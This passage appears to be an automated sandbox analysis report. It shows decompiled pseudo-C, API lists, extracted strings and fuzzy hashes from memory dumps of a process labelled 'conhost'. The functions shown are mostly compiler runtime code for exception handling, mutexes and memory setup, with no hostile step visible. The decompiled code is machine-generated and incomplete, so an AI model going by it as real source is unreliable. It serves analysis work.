                        				 *0x935f4118 = 0;
                        				 *0x935f4108 = 0;
                        				goto 0x935f1aa9;
                        				0;
                        				0;
                        				0;
                        			}
                        0x7ff6935f1870
                        0x7ff6935f187b
                        0x7ff6935f187e
                        0x7ff6935f1894
                        0x7ff6935f1899
                        0x7ff6935f189f
                        0x7ff6935f18a7
                        0x7ff6935f18b0
                        0x7ff6935f18b2
                        0x7ff6935f18c0
                        0x7ff6935f18cb
                        0x7ff6935f18ce
                        0x7ff6935f18e4
                        0x7ff6935f18e9
                        0x7ff6935f18ef
                        0x7ff6935f18f7
                        0x7ff6935f1900
                        0x7ff6935f1902
                        0x7ff6935f1910
                        0x7ff6935f191b
                        0x7ff6935f191e
                        0x7ff6935f1934
                        0x7ff6935f1939
                        0x7ff6935f193f
                        0x7ff6935f1947
                        0x7ff6935f1950
                        0x7ff6935f1960
                        0x7ff6935f196b
                        0x7ff6935f196e
                        0x7ff6935f1984
                        0x7ff6935f198f
                        0x7ff6935f1997
                        0x7ff6935f19a0
                        0x7ff6935f19b1
                        0x7ff6935f19b3
                        0x7ff6935f19c4
                        0x7ff6935f19c6
                        0x7ff6935f19d7
                        0x7ff6935f19d9
                        0x7ff6935f19ea
                        0x7ff6935f19ec
                        0x7ff6935f19f7
                        0x7ff6935f19f9
                        0x7ff6935f1a0a
                        0x7ff6935f1a0c
                        0x7ff6935f1a1d
                        0x7ff6935f1a1f
                        0x7ff6935f1a30
                        0x7ff6935f1a32
                        0x7ff6935f1a43
                        0x7ff6935f1a45
                        0x7ff6935f1a4e
                        0x7ff6935f1a56
                        0x7ff6935f1a5e
                        0x7ff6935f1a6d
                        0x7ff6935f1a77
                        0x7ff6935f1a82
                        0x7ff6935f1a87
                        0x7ff6935f1a91
                        0x7ff6935f1a93
                        0x7ff6935f1a9a
                        0x7ff6935f1aa1
                        0x7ff6935f1ab4
                        0x7ff6935f1ab9
                        0x7ff6935f1ac4
                        0x7ff6935f1acf
                        0x7ff6935f1ad7
                        0x7ff6935f1adb
                        0x7ff6935f1adf

                        APIs
                          • Part of subcall function 00007FF6935F0CD0: malloc.MSVCRT(?,?,?,?,00007FF6935F16E5,?,?,?,?,00007FF6935C34A4), ref: 00007FF6935F0CE1
                          • Part of subcall function 00007FF6935CF280: RtlCaptureContext.KERNEL32 ref: 00007FF6935CF305
                          • Part of subcall function 00007FF6935CF280: RtlUnwindEx.KERNEL32 ref: 00007FF6935CF323
                          • Part of subcall function 00007FF6935CF280: abort.MSVCRT ref: 00007FF6935CF329
                        • malloc.MSVCRT ref: 00007FF6935F1A82
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: strlen$malloc$CaptureContextUnwindabort
                        • String ID:
                        • API String ID: 3412053993-0
                        • Opcode ID: ca3d01152eea4bb4fb6ef27bcb079ca9f80667923325b74fd32d3c8c0e57c1fc
                        • Instruction ID: f3d11a4e2ecc5aad80574d9ece5ab96f1d88db201d95b7c3f1a65e6cc28acc8f
                        • Opcode Fuzzy Hash: ca3d01152eea4bb4fb6ef27bcb079ca9f80667923325b74fd32d3c8c0e57c1fc
                        • Instruction Fuzzy Hash: 51519261A0974681EA34AB16FC573B663A8FB4D7C8F4014B0D98DAB396CF7DE1449384
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 72%
                        			E00007FF67FF6935F16D0() {
                        				long long _v464;
                        				void* _t69;
                        				void* _t71;
                        				void* _t72;
                        				int _t74;
                        				long long* _t83;
                        				void* _t84;
                        				void* _t85;
                        				int _t97;
                        				int _t105;
                        				void* _t162;
                        				int _t163;
                        				int _t164;
                        				int _t165;
                        				int _t166;
                        				int _t167;
                        				int _t168;
                        				int _t169;
                        				int _t170;
                        				int _t177;
                        				int _t181;
                        
                        				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t85);
                        				_t163 = _t74;
                        				E00007FF67FF6935E89B0(_t74, _t85);
                        				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t163, 0x935f8b30, 0x7ff6935e8ae0, _t162, _t163, _t85);
                        				_t173 = _t74;
                        				E00007FF67FF6935F1020(_t163);
                        				E00007FF67FF6935CF280();
                        				_push(_t74);
                        				_push(_t163);
                        				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t74);
                        				_t164 = _t74;
                        				E00007FF67FF6935E92C0(_t74, _t74);
                        				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t164, 0x935f8b70, 0x7ff6935e93e0, _t162, _t164, _t173);
                        				_t175 = _t74;
                        				E00007FF67FF6935F1020(_t164);
                        				E00007FF67FF6935CF280();
                        				_push(_t74);
                        				_push(_t164);
                        				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t74);
                        				_t165 = _t74;
                        				E00007FF67FF6935E9FA0(_t74, _t74);
                        				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t165, 0x935f8c50, 0x7ff6935ea0c0, _t162, _t165, _t175);
                        				_t177 = _t74;
                        				E00007FF67FF6935F1020(_t165);
                        				_t97 = _t177;
                        				E00007FF67FF6935CF280();
                        				_push(_t177);
                        				_push(_t165);
                        				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t97);
                        				_t166 = _t74;
                        				E00007FF67FF6935E9440(_t74, _t97);
                        				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t166, 0x935f8b90, 0x7ff6935e9560, _t162, _t166, _t97);
                        				_t179 = _t74;
                        				E00007FF67FF6935F1020(_t166);
                        				E00007FF67FF6935CF280();
                        				_push(_t74);
                        				_push(_t166);
                        				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t74);
                        				_t167 = _t74;
                        				E00007FF67FF6935E95C0(_t74, _t74);
                        				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t167, 0x935f8bb0, 0x7ff6935e96e0, _t162, _t167, _t179);
                        				_t181 = _t74;
                        				E00007FF67FF6935F1020(_t167);
                        				_t105 = _t181;
                        				E00007FF67FF6935CF280();
                        				_push(_t181);
                        				_push(_t167);
                        				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t105);
                        				_t168 = _t74;
                        				E00007FF67FF6935E9AD0(_t74, _t105);
                        				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t168, 0x935f8bf0, 0x7ff6935e9c00, _t162, _t168, _t105);
                        				_t183 = _t74;
                        				E00007FF67FF6935F1020(_t168);
                        				E00007FF67FF6935CF280();
                        				_push(_t74);
                        				_push(_t168);
                        				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t74);
                        				_t169 = _t74;
                        				E00007FF67FF6935E8B80(_t74, _t74);
                        				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t169, 0x935f8b50, 0x7ff6935e8ca0, _t162, _t169, _t183);
                        				_t185 = _t74;
                        				E00007FF67FF6935F1020(_t169);
                        				E00007FF67FF6935CF280();
                        				_push(_t74);
                        				_push(_t169);
                        				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t74);
                        				_t170 = _t74;
                        				E00007FF67FF6935E9CA0(_t74, _t74);
                        				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t170, 0x935f8c10, 0x7ff6935e9dc0, _t162, _t170, _t185);
                        				_t187 = _t74;
                        				E00007FF67FF6935F1020(_t170);
                        				E00007FF67FF6935CF280();
                        				_push(_t74);
                        				E00007FF67FF6935F0CD0(_t71, _t72, _t74, _t74);
                        				E00007FF67FF6935E9E20(_t74, _t74);
                        				E00007FF67FF6935F1490(0x10, _t69, _t74, _t84, _t74, 0x935f8c30, 0x7ff6935e9f40, _t162, _t74, _t187);
                        				E00007FF67FF6935F1020(_t74);
                        				E00007FF67FF6935CF280();
                        				_v464 = 0;
                        				asm("ud2");
                        				_v464 = 0;
                        				asm("ud2");
                        				_v464 = 0;
                        				asm("ud2");
                        				_v464 = 0;
                        				asm("ud2");
                        				 *0 = 0;
                        				asm("ud2");
                        				_v464 = 0;
                        				asm("ud2");
                        				_v464 = 0;
                        				asm("ud2");
                        				_v464 = 0;
                        				asm("ud2");
                        				_v464 = 0;
                        				asm("ud2");
                        				_v464 = 0;
                        				_t83 =  *0x10;
                        				asm("ud2");
                        				0;
                        				E00007FF67FF6935CFD40(0x935f4100, 0x935f8c30);
                        				 *0x935f4118 = 0x12400;
                        				malloc(_t170);
                        				 *0x935f4110 = _t83;
                        				if (_t83 == 0) goto 0x935f1ab9;
                        				 *0x935f4108 = _t83;
                        				 *_t83 = 0x12400;
                        				 *((long long*)(_t83 + 8)) = 0;
                        				goto E00007FF67FF6935C1520;
                        				 *0x935f4118 = 0;
                        				 *0x935f4108 = 0;
                        				goto 0x935f1aa9;
                        				0;
                        				0;
                        				0;
                        			}

                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: strlen$CaptureContextUnwindabortmalloc
                        • String ID: basic_string::_M_create
                        • API String ID: 214865124-3122258987
                        • Opcode ID: 8a1076d30abc1c720dabcdd976f0f24d5d258cee043a9d74d9cd453909d931a0
                        • Instruction ID: b065db76cf8bab041efc457feb1abc714d851ad0e67101f3d60d5ba24ebe4e47
                        • Opcode Fuzzy Hash: 8a1076d30abc1c720dabcdd976f0f24d5d258cee043a9d74d9cd453909d931a0
                        • Instruction Fuzzy Hash: 0A11CC44E0A24755EC68BA637C172BA5259FF4EBC9F8028B0EC0EFB386DD2CA1059345
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fe9eac2fc72e3075f8d3b2ce7c926098fc17b7bfbc30ab7d3e215ac876d6e874
                        • Instruction ID: c0f87e576fb24b15a197cbfe82def1137c520be43a88b9dc09588f5867696eca
                        • Opcode Fuzzy Hash: fe9eac2fc72e3075f8d3b2ce7c926098fc17b7bfbc30ab7d3e215ac876d6e874
                        • Instruction Fuzzy Hash: CCE09276A08B85C2D614DB52F88145EB774F79D7C4B105929EACC53B29CF3CD1A0CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 17%
                        			E00007FF67FF6935E2560(void* __edi, void* __eflags, void* __rbx, void* __rcx, void* __rdx, int __rdi, void* __rsi, void* __r12, char* __r13, int __r14, void* __r15) {
                        				void* _t43;
                        				void* _t75;
                        				void* _t93;
                        				void* _t94;
                        				intOrPtr _t100;
                        				long long* _t107;
                        				void* _t113;
                        				long long* _t114;
                        				long long* _t134;
                        				long long _t136;
                        				void* _t142;
                        				char* _t153;
                        				void* _t154;
                        				void* _t155;
                        				void* _t156;
                        				void* _t157;
                        				void* _t158;
                        				long long* _t170;
                        
                        				_t93 = __edi;
                        				_t156 = _t155 - 0x90;
                        				_t154 = _t156 + 0x90;
                        				 *((long long*)(_t154 - 0x38)) = 0x7562206c;
                        				_t138 = __rdx - __rcx;
                        				 *((long long*)(_t154 - 0x40)) = 0x74696d62;
                        				 *((long long*)(_t154 - 0x30)) = 0x74726f70;
                        				_t5 = _t138 + 0x78; // 0x756f6e6520746fe6
                        				 *((long long*)(_t154 - 0x28)) = 0x70747468;
                        				 *((long long*)(_t154 - 0x20)) = 0x2e636367;
                        				 *((long long*)(_t154 - 0x18)) = 0x2f67726f;
                        				_t113 = __rdx - __rcx;
                        				 *((long long*)(_t154 - 0x70)) = 0x20746f6e;
                        				 *((long long*)(_t154 - 0x68)) = 0x73206867;
                        				 *((long long*)(_t154 - 0x60)) = 0x726f6620;
                        				 *((long long*)(_t154 - 0x58)) = 0x2074616d;
                        				 *((long long*)(_t154 - 0x50)) = 0x6f69736e;
                        				 *((long long*)(_t154 - 0x48)) = 0x7361656c;
                        				 *((long long*)(_t154 - 0x10)) = 0xa3a292f;
                        				 *((char*)(_t154 - 8)) = 0;
                        				E00007FF67FF6935CEA40(_t43);
                        				_t157 = _t156 - (_t5 & 0xfffffff0);
                        				 *((long long*)(_t157 + 0x58)) = 0x7562206c;
                        				 *((long long*)(_t157 + 0x50)) = 0x74696d62;
                        				 *((long long*)(_t157 + 0x68)) = 0x70747468;
                        				 *((long long*)(_t157 + 0x60)) = 0x74726f70;
                        				 *((long long*)(_t157 + 0x78)) = 0x2f67726f;
                        				_t142 = __rcx;
                        				 *((long long*)(_t157 + 0x80)) = 0xa3a292f;
                        				 *(_t157 + 0x20) = 0x20746f6e;
                        				 *((long long*)(_t157 + 0x28)) = 0x73206867;
                        				 *((long long*)(_t157 + 0x30)) = 0x726f6620;
                        				 *((long long*)(_t157 + 0x38)) = 0x2074616d;
                        				 *((long long*)(_t157 + 0x40)) = 0x6f69736e;
                        				 *((long long*)(_t157 + 0x48)) = 0x7361656c;
                        				 *((long long*)(_t157 + 0x70)) = 0x2e636367;
                        				memcpy(__rbx, __rsi, __rdi);
                        				 *((char*)(_t157 + _t113 + 0x88)) = 0;
                        				E00007FF67FF6935F16D0();
                        				0;
                        				0;
                        				_t158 = _t157 - 0x30;
                        				if ( *0x935f4140 != 0) goto 0x935e280a;
                        				 *0x935f4140 = 1;
                        				E00007FF67FF6935F0EF0(0x2e636367);
                        				if (0x2e636367 == 0) goto 0x935e27e0;
                        				 *((intOrPtr*)(_t158 + 0x2c)) = 0xffffffff;
                        				r8d = 0;
                        				E00007FF67FF6935CD5B0(0x2e636367,  *0x2E756E672E63636F + 0x2e636367, _t142, _t113, _t158 + 0x2c);
                        				_t114 =  *0x935f4050; // 0x7ff6935e10f0
                        				 *_t114();
                        				r8d = 0x30;
                        				fwrite(_t113, _t157 + 0x20);
                        				if ( *((intOrPtr*)(_t158 + 0x2c)) == 0) goto 0x935e27d1;
                        				 *_t114();
                        				fputs(__r13);
                        				 *_t114();
                        				r8d = 2;
                        				fwrite(__r12, __r14);
                        				_t100 =  *((intOrPtr*)(_t158 + 0x2c));
                        				if (_t100 != 0) goto 0x935e27cc;
                        				free(__r15);
                        				E00007FF67FF6935F1440(2, 1, 0x2e636367, _t114, _t113, 0x2e636367,  *0x2E756E672E63636F + 0x2e636367, 0x2e636367);
                        				 *_t114();
                        				fputs(_t153);
                        				goto 0x935e279b;
                        				 *0x935f4050();
                        				r8d = 0x2d;
                        				fwrite(??, ??, ??, ??);
                        				abort();
                        				 *0x935f4050();
                        				r8d = 0x1d;
                        				fwrite(??, ??, ??, ??);
                        				abort();
                        				if (_t100 != 0) goto 0x935e289f;
                        				0x935f0d40();
                        				_t107 =  *0x2e636367;
                        				 *((intOrPtr*)(_t107 + 0x10))();
                        				 *_t114();
                        				_t170 = _t107;
                        				r8d = 0xb;
                        				fwrite(??, ??, ??, ??);
                        				 *_t114();
                        				fputs(??, ??);
                        				 *_t114();
                        				fputc(??, ??);
                        				E00007FF67FF6935F0F50(_t107);
                        				goto 0x935e2805;
                        				0x935f0d40();
                        				E00007FF67FF6935F0F50(_t107);
                        				_t178 = _t107;
                        				E00007FF67FF6935F0F50(_t107);
                        				_t134 = _t107;
                        				E00007FF67FF6935CF280();
                        				E00007FF67FF6935F0CD0(_t93, _t94, _t107, _t134);
                        				 *_t107 = 0x935f90e0;
                        				_t75 = E00007FF67FF6935F1490(8, 1, 0x935f90e0, _t114, _t107, 0x935f8ad0, 0x7ff6935e2510, _t170, _t178, 0x2e636367);
                        				_t136 =  *0x935f4110; // 0x2954bcb0080
                        				if (_t136 == 0) goto 0x935e2910;
                        				free(??);
                        				 *0x935f4110 = 0;
                        				return _t75;
                        			}

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: fwrite$fputs$abortfreememcpy$fputcstrlen
                        • String ID: what(): $ for for$/): $bmit ful$bmit ful$gcc.gnu.$gcc.gnu.$gh space$https://$https://$l bug re$l bug re$lease su$mat expa$not enou$nsion (P$org/bugs$org/bugs$port at $port at $terminate called after throwing an instance of '$terminate called recursively$terminate called without an active exception
                        • API String ID: 1586115568-1351603976
                        • Opcode ID: de2f6cc281b7ae6d443784ed337ef4c4990e2612a298669d1a648d2f37b8b72c
                        • Instruction ID: ceae7b5b22d09f142d878025016e483b604d63caf1a2089a0cf5ab5b9105c57e
                        • Opcode Fuzzy Hash: de2f6cc281b7ae6d443784ed337ef4c4990e2612a298669d1a648d2f37b8b72c
                        • Instruction Fuzzy Hash: 56710661B0874146FB30ABA2B8467BD76A9FB49B84F544178ED9DA7BCADE3CD104C301
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: AtomMutex$CloseCreateCurrentFindHandleObjectProcessReleaseSingleWait_onexit
                        • String ID: __eh_shmem3_gcc_tdm_$aaaaaaaa$aaaaaaaa$failed to add string to atom table$failed to get string from atom$failed to to lock creation mutex
                        • API String ID: 2382646235-4003979217
                        • Opcode ID: bf1e105220a97cb527f675185c6b9909b0a7e652d6da0020295db7e9e489d043
                        • Instruction ID: cc101a6ee0fd516a72a548e3d787f2886c95eed090114b9ba88be0742e50cc6f
                        • Opcode Fuzzy Hash: bf1e105220a97cb527f675185c6b9909b0a7e652d6da0020295db7e9e489d043
                        • Instruction Fuzzy Hash: 9661B375E0DA4791FF358B26E8032B52798FF58786F8084B5C95EE7290EE3CA505E300
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E00007FF67FF6935D28E0(void* __edx, void* __r8) {
                        
                        				if (__edx != 0) goto 0x935d2908;
                        				if (__r8 == 0) goto 0x935d2948;
                        				return 1;
                        			}

                        APIs
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CloseHandleValue$ExceptionHandlerRemoveVectored
                        • String ID:
                        • API String ID: 2941551293-0
                        • Opcode ID: 043dcb9ba3a615ab50d376f0fa0b1e3dd335128a17022762d9f12ddf64c4e346
                        • Instruction ID: 0c0d7d1b1c5e56debcb2120e736861be781aa1a389731c596ff0fbf73387fcb9
                        • Opcode Fuzzy Hash: 043dcb9ba3a615ab50d376f0fa0b1e3dd335128a17022762d9f12ddf64c4e346
                        • Instruction Fuzzy Hash: CE223731A09B0685FA749B22D49637823A8FF4CB98F5405B6DA2DA73E5DF3CE445D301
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: CloseHandleMutex$AtomCreateFindObjectReleaseSingleWait
                        • String ID: JiAlAaAa__shmem3_winpthreads_tdm_$__shmem3_winpthreads_tdm_-aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaaAaaAAaAAaaaaaaaAaaaAAAAAaaaa$failed to to lock cleanup mutex
                        • API String ID: 3776795807-314959845
                        • Opcode ID: cca8fa040cd36adcd71f5b5738974d92ba3a1bc4b9603ae438584e591e5e5248
                        • Instruction ID: 18d83ee2efdf5612ee8a135367f66f33401dc9d668e585e67f85152f18bfaf61
                        • Opcode Fuzzy Hash: cca8fa040cd36adcd71f5b5738974d92ba3a1bc4b9603ae438584e591e5e5248
                        • Instruction Fuzzy Hash: E5214530A09A4381FE759B62D8571382399FF48B85B9495B6D82DFB790EF3CE446D310
                        Uniqueness

                        Uniqueness Score: -1.00%

                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 0000003A.00000002.593746388.00007FF6935C1000.00000020.00000001.01000000.00000000.sdmp, Offset: 00007FF6935C0000, based on PE: true
                        • Associated: 0000003A.00000002.593727394.00007FF6935C0000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593942699.00007FF6935F2000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.593986329.00007FF6935F5000.00000002.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594040400.00007FF693602000.00000004.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594074676.00007FF693604000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594088711.00007FF693607000.00000008.00000001.01000000.00000000.sdmp
                        • Associated: 0000003A.00000002.594115551.00007FF693608000.00000002.00000001.01000000.00000000.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_58_2_7ff6935c0000_conhost.jbxd
                        Similarity
                        • API ID: ExceptionRaiseUnwindabort
                        • String ID: CCG $CCG!$CCG!$CCG"
                        • API String ID: 4140830120-3707373406
                        • Opcode ID: 224a963650e0a92e267060df980812569b314a0e2d81e6bbb01a8786489569fe
                        • Instruction ID: 6185589544e7fd56c10212568d34e7d10318320af947ac0172ba0db8aff37394
                        • Opcode Fuzzy Hash: 224a963650e0a92e267060df980812569b314a0e2d81e6bbb01a8786489569fe
                        • Instruction Fuzzy Hash: 16517036608B8086D7708F55E8816AD73A8F789B98F644136EE8EA3B58CF3DD491C740
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 46%
                        			E00007FF67FF6935D15E0(void* __edi, void* __esp, void* __rbx, void* __rdi, void* __rsi, void* __rbp, void* __r12, void* __r13, void* __r14, void* __r15) {
                        				char _v14;
                        				short _v16;
                        				long long _v24;
                        				long long _v32;
                        				long long _v40;
                        				long long _v48;
                        				long long _v56;
                        				long long _v64;
                        				long long _v72;
                        				long long _v80;
                        				char _v81;
                        				long long _v88;
                        				long long _v96;
                        				long long _v104;
                        				long long _v112;
                        				char _v120;
                        				void* _t206;
                        				signed int _t214;
                        				intOrPtr _t220;
                        				void* _t281;
                        				intOrPtr _t340;
                        				intOrPtr _t341;
                        				intOrPtr _t342;
                        				intOrPtr _t343;
                        				intOrPtr _t344;
                        				intOrPtr _t347;
                        				intOrPtr _t348;
                        				intOrPtr _t350;
                        				intOrPtr _t351;
                        				intOrPtr _t353;
                        				intOrPtr _t354;
                        				intOrPtr _t355;
                        				intOrPtr _t357;
                        				intOrPtr _t358;
                        				intOrPtr _t359;
                        				intOrPtr _t361;
                        				intOrPtr _t363;
                        				intOrPtr _t366;
                        				intOrPtr _t367;
                        				intOrPtr _t369;
                        				intOrPtr _t372;
                        				intOrPtr _t375;
                        				intOrPtr _t377;
                        				intOrPtr _t378;
                        				intOrPtr _t380;
                        				intOrPtr _t383;
                        				intOrPtr _t384;
                        				intOrPtr _t386;
                        				intOrPtr _t389;
                        				intOrPtr _t391;
                        				intOrPtr _t392;
                        				intOrPtr _t394;
                        				intOrPtr _t395;
                        				intOrPtr _t401;
                        				intOrPtr _t402;
                        				intOrPtr* _t405;
                        				void* _t406;
                        				void* _t412;
                        				intOrPtr* _t413;
                        				signed long long _t415;
                        				void* _t436;
                        				signed long long _t482;
                        				void* _t492;
                        				long long _t494;
                        				intOrPtr* _t496;
                        				intOrPtr* _t497;
                        				void* _t498;
                        				void* _t499;
                        				void* _t517;
                        				void* _t518;
                        				void* _t526;
                        				void* _t536;
                        
                        				_t499 = _t498 - 0x98;
                        				_v120 = 0x6f727245;
                        				_v112 = 0x696e6165;
                        				_v104 = 0x70732070;
                        				_v96 = 0x20737965;
                        				_v88 = 0x65726874;
                        				_v80 = 0x20737965;
                        				_v72 = 0;
                        				_v64 = 0;
                        				_v56 = 0;
                        				_v48 = 0;
                        				_v40 = 0;
                        				_v32 = 0;
                        				_v24 = 0;
                        				_v16 = 0;
                        				_v14 = 0;
                        				GetCurrentThreadId();
